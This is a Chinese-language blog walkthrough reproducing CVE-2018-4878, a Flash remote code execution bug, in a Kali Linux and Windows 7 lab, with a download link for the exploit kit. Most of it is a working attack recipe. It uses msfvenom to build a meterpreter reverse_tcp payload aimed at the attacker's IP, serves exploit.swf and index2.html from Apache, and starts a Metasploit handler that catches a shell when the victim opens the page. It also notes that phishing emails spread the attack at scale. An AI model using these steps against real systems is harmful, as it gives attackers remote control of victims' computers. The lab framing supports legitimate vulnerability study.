[漏洞复现] CVE-2018-4878 Flash 0day

1、漏洞概述
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。
这里写图片描述
2、漏洞复现环境
Kali Linux + Windows 7 sp1
渗透机:Kali Linux (ip:172.16.70.216)
靶机:Windows 7 sp1 (ip:172.16.70.199)
exp:cve-2018-4878.py
flash:flashplayer_activex_28.0.0.137.exe

注:此实验环境所用渗透机和靶机,跟之前文章所分享一致。为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘=>
链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
这里写图片描述
3、实验流程
①将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面
这里写图片描述
②使用msfvenom生成shell代码
生成代码,其中lhost为kali的ip地址,lport为自定义的端口号

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888  -f  python>shellcode.txt 

这里写图片描述
查看代码文件
root@kali:~# cat shellcode.txt

这里写图片描述
③进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件
将上面msfvenom生成的代码覆盖掉原来的代码:

这里写图片描述

修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):

这里写图片描述

④Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py 
root@kali:~/Desktop/CVE-2018-4878-master# ls -l 

这里写图片描述

⑤Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start 
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html 
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf 

这里写图片描述
此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

⑥Kali Linux开启Shell会话监听
使用handler监听模块

msf > use exploit/multi/handler

回弹一个tcp连接

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

设置kali渗透机的ip地址

msf exploit(handler) > set lhost 172.16.70.216 

设置监听端口,这个需跟上面msfvenom设置的端口一致

msf exploit(handler) > set lport 8888 

开启监听,等待目标上线

msf exploit(handler) > exploit

这里写图片描述

⑦Windows7 安装flash插件,并用IE浏览器访问页面
搜索flash最新的28版本

这里写图片描述

安装flash插件

这里写图片描述

使用Win7内置IE 8浏览器访问页面:http://172.16.70.216/index2.html

这里写图片描述

⑧Kali Linux 上获取meterpreter shell,并进行管理

这里写图片描述
这里写图片描述

实验总结:

可以看到,最终由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制。

真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果。

  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值